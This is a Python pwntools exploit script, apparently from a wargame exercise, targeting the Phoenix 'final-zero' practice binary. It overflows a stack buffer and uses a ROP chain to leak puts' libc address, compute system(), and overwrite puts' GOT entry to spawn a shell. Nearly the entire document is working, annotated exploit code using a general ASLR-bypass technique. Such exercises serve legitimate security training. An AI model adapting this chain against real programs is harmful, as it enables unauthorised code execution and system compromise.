
Phoenix final-zero: local ASLR bypass (leak puts() through the PLT, then overwrite its GOT entry with system())

  1. #!/usr/bin/python
  2.  
  3. from pwn import *
  4.  
# The Phoenix final-zero target (32-bit build). It is spawned at import time so
# that main() can drive it through this module-level handle.
TARGET_BINARY = "/opt/phoenix/i486/final-zero"
p = process(TARGET_BINARY)
  6.  
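def main():
    """Exploit Phoenix final-zero: leak libc via puts@plt, then turn puts' GOT slot into system().

    Stage 1 overflows the stack buffer (532 bytes of padding, found with a
    cyclic pattern) and returns into a three-call ROP chain:
      1. puts(puts@got)   -> prints the resolved libc address of puts
      2. gets(puts@got)   -> reads our stage-2 line straight into that GOT slot
      3. puts@plt("sh")   -> the slot now holds system(), so this is system("sh")
    Every call is laid out as [callee][pop ebp ; ret][argument]: the gadget pops
    the argument off the stack on return, so the next callee is reached cleanly.

    Stage 2 sends the computed address of system() as the line gets() consumes.

    Side effects: talks to the global `p` process, writes the raw 4-byte leak to
    ./dumpfile (for `hexdump`), and hands the session over with p.interactive().
    Aborts via pwnlib's log.error (raises) when the leaked libc base is not
    page-aligned, i.e. the leak or the hard-coded libc offsets are wrong.
    """
    # Skip the banner line the target prints on start-up.
    p.recvline()

    # --- fixed addresses inside the non-PIE binary; only libc moves under ASLR ---
    # call   0x80483f0 <puts@plt>
    puts_plt = 0x80483f0
    # call   0x80483e0 <gets@plt>
    gets_plt = 0x80483e0
    # 08049968  00000407 R_386_JUMP_SLOT   00000000   puts
    puts_got = 0x08049968
    # (printf's slot is the one just below, 08049960 R_386_JUMP_SLOT printf; unused here.)
    # 0x080485ac : pop ebp ; ret
    pop_ret = 0x080485ac
    # final-zero : 0x8048f9d --> 0x2e006873 ('sh')  -- a NUL-terminated "sh" in the binary
    sh = 0x8048f9d

    # --- offsets inside the target's musl libc ---
    # objdump -d /opt/phoenix/i486-linux-musl/lib/libc.so | grep "<puts>"   -> 0004b8ee
    # objdump -d /opt/phoenix/i486-linux-musl/lib/libc.so | grep "<system>" -> 00040824
    puts_offset = 0x0004b8ee
    system_offset = 0x00040824

    # 1095791425 (0x41514141) found at offset: 532 -- bytes up to the saved return address.
    # Bytes literals keep the concatenation with p32() valid on both Python 2 and 3.
    padding = b"A" * 532

    # The final puts@plt call dispatches through the GOT slot we overwrite, so it
    # really calls system(); the alias makes the chain read the way it executes.
    new_system_plt = puts_plt

    # Stage 1: leak puts' resolved address.
    chain = padding
    chain += p32(puts_plt)
    chain += p32(pop_ret)
    chain += p32(puts_got)
    # Stage 2: gets() reads the next line we send into puts' GOT slot.
    chain += p32(gets_plt)
    chain += p32(pop_ret)
    chain += p32(puts_got)
    # Stage 3: puts@plt is system() by now, "sh" is its argument. The 0x90909090
    # word is only a placeholder for system()'s return address.
    chain += p32(new_system_plt)
    chain += b"\x90" * 4
    chain += p32(sh)

    p.sendline(chain)
    # puts() prints the GOT slot; take exactly the 4 address bytes. recv(4) may
    # return a short read, after which u32() would fail on a partial leak.
    leak = p.recvn(4)

    # Debug aid: keep the raw leak so it can be inspected with `hexdump dumpfile`.
    with open("dumpfile", "wb") as f:
        f.write(leak)

    log.info("-----Stage 1-----")
    log.info("Leak length: %d" % len(leak))

    puts_addr = u32(leak)
    log.success("puts addr: 0x%x" % puts_addr)
    log.success("puts got: 0x%x" % puts_got)

    libc_base = puts_addr - puts_offset
    log.success("libc base addr: 0x%x" % libc_base)
    # A shared library is mapped page-aligned; a misaligned base means the leak or
    # the puts offset is wrong, and writing a bogus address into the GOT is pointless.
    if libc_base & 0xfff:
        log.error("libc base 0x%x is not page-aligned: bad leak or wrong libc offsets" % libc_base)

    system = libc_base + system_offset
    log.success("system addr: 0x%x" % system)

    # Stage 2: this line is what gets(puts_got) reads, so it lands in the GOT slot.
    # NOTE(review): gets() also writes a terminating NUL at puts_got+4 (low byte of
    # the next slot); presumably harmless before system() runs -- confirm.
    p.sendline(p32(system))
    log.info("-----Stage 2-----")
    log.warn("Overwrite puts_got with system")
    spinner = log.progress("Executing shell....")
    # Skip one line of junk -- presumably the tail of the puts() leak, since puts
    # keeps printing past our 4 bytes until it hits a NUL. Blocks if nothing arrives.
    p.recvline()
    # Resolve the progress line so its spinner does not keep animating under interactive().
    spinner.success("done")

    p.interactive()  # Hand the shell over to the user.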
  87.  
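if __name__ == "__main__":
    # Only run the exploit when executed as a script. The call must be indented
    # under the guard; at column 0 (as pasted) it is an IndentationError.
    main()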